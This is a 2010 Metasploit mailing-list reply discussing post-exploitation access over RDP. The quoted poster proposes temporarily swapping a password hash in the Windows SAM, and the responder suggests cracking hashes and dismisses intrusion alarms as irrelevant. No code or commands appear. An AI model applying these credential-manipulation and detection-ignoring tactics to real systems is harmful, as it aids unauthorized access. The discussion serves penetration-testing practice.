Re: Simple script to swap hashes in SAM ..

[Daniel Clemens <daniel.clemens () packetninjas net>]

On Sep 7, 2010, at 4:18 AM, John Nash wrote:

> Hello List,
>
> While trying some post exploitation, one of the major issues i guess is to login to the system as a user over rdp.

Hrm.
A screenshot seems to be worth a thousand words. 

> We can do this in a couple of ways:
>
>       • create a new user <--- will create alarms

Who really cares if it creates alarms.
Seriously 99% of the time the response time will be nominal and no one will respond so why worry about it.
If you have the ability to create accounts then its most likely game over already and you've exploited what needs to be 
exploited to prove insecurity. 

>       • change the password of existing user
>
> in case of (2) i was wondering would it be possible to just swap the existing hash with a new one (we now the 
> password which hashes to this one) .... then do all we need to on the remote system ....
> then just replace the old hash for the original password back into the SAM.

Or crack the hashes so you know the password. 

> Is there any reason why this should not be possible? If yes, a meterepreter script could do this job very easily .... 
>
> thoughts?

It seems like your asking the wrong questions.
My rule of thumb with any assessment or engagement is to first assess if I am asking the wrong questions.
If I'm asking the wrong questions I'll always get the wrong answers.
Though this is a novel idea, I don't think its that valuable in the long run. 


| Daniel Uriah Clemens
| Packetninjas L.L.C | | http://www.packetninjas.net
| c. 205.567.6850      | | o. 866.267.8851 
"Moments of sorrow are moments of sobriety"











_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework